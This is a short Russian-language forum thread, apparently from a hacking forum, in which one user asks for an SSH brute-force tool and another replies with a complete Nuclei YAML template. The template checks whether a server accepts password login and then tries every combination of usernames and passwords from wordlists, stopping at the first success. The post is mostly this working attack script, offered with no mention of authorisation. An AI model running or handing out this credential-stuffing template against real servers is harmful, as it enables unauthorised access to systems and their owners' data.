брутфорс [ищу] ssh brute

Reduct · 18.06.2025

Имеется что либо ?

Nick Diesel · 18.06.2025

nuclei в помощь -> https://docs.projectdiscovery.io/templates/structure

А вот и шаблон:

Код:

id: ssh-brute

info:
  name: SSH Credential Stuffing
  author: tarunKoyalwar
  severity: critical
 

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      // only bruteforce if ssh allows password based authentication
      response["UserAuth"].includes("password")

    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);

    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "{{usernames}}"
      Password: "{{passwords}}"
    
    payloads:
      usernames: helpers/wordlists/ssh-users.txt
      passwords: helpers/wordlists/ssh-passwords.txt
    attack: clusterbomb
    threads: 10
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and

брутфорс [ищу] ssh brute

Reduct

floppy-диск

Nick Diesel

database_broker